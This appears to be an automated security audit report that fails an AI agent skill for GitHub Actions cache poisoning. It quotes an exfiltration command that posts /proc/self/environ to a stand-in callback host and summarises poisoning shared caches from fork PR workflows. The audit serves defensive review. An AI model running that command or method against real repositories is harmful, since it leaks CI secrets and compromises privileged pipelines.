github-actions-cache-poisoning

Fail

Audited by Gen Agent Trust Hub on Sep 22, 2026

Risk Level: HIGHDATA_EXFILTRATIONCOMMAND_EXECUTIONPRIVILEGE_ESCALATION
Full Analysis
  • [DATA_EXFILTRATION]: The skill provides a functional payload command (curl -d @/proc/self/environ https://CALLBACK) designed to exfiltrate the contents of /proc/self/environ, which typically contains sensitive environment variables, secrets, and tokens from the CI/CD environment.- [COMMAND_EXECUTION]: The Methodology and Payloads & Tools sections contain executable Python code and Bash scripts for interacting with the GitHub Actions Cache API to perform 'cache stuffing' and deploy 'poisoned' node modules.- [PRIVILEGE_ESCALATION]: The core methodology of the skill describes how to leverage a low-privilege execution context (such as a fork PR workflow) to attack and compromise a privileged workflow by poisoning shared repository caches.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Sep 22, 2026, 05:34 PM
Security Audit — agent-trust-hub — github-actions-cache-poisoning